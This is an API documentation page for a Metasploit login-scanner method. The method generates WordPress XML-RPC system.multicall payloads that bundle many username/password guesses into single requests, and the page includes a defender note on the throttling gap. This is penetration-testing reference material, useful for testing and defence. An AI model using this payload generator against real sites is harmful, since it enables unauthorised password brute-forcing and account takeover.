Method: Metasploit::Framework::LoginScanner::WordpressMulticall#generate_xml

Defined in:
lib/metasploit/framework/login_scanner/wordpress_multicall.rb

#generate_xml(user) ⇒ Array

Returns the XML-RPC request bodies used for the login attempts, one XML document per group of passwords.

Parameters:

  • user (String)

    username

Returns:

  • (Array)


# File 'lib/metasploit/framework/login_scanner/wordpress_multicall.rb', line 42

# Builds the XML-RPC request bodies for one username.
#
# The password list is cut into groups of at most +chunk_size+ entries, and
# each group becomes a single +system.multicall+ document whose entries are
# +wp.getUsersBlogs+ calls carrying the (user, password) pair. The original
# comment attributes the per-request cap to a WordPress limit of 1700.
#
# Defender note: one HTTP request built here carries many authentication
# attempts, so per-request throttling on the XML-RPC endpoint under-counts
# them; monitoring or restricting +system.multicall+ is the relevant control.
#
# @param user [String] username placed in every call of every document
# @return [Array] one serialized XML document per password group
def generate_xml(user)
  passwords.each_slice(chunk_size).map do |pass_group|
    builder = Nokogiri::XML::Builder.new do |xml|
      xml.methodCall do
        xml.methodName("system.multicall")
        xml.params do
          xml.param do
            xml.value do
              xml.array do
                xml.data do
                  # One <struct> per password: the method to invoke plus its
                  # positional arguments (username, then password).
                  pass_group.each do |pass|
                    xml.value do
                      xml.struct do
                        xml.member do
                          xml.name("methodName")
                          xml.value { xml.string("wp.getUsersBlogs") }
                        end
                        xml.member do
                          xml.name("params")
                          xml.value do
                            xml.array do
                              xml.data do
                                xml.value do
                                  xml.array do
                                    xml.data do
                                      xml.value { xml.string(user) }
                                      xml.value { xml.string(pass) }
                                    end
                                  end
                                end
                              end
                            end
                          end
                        end
                      end
                    end
                  end
                end
              end
            end
          end
        end
      end
    end

    builder.to_xml
  end
end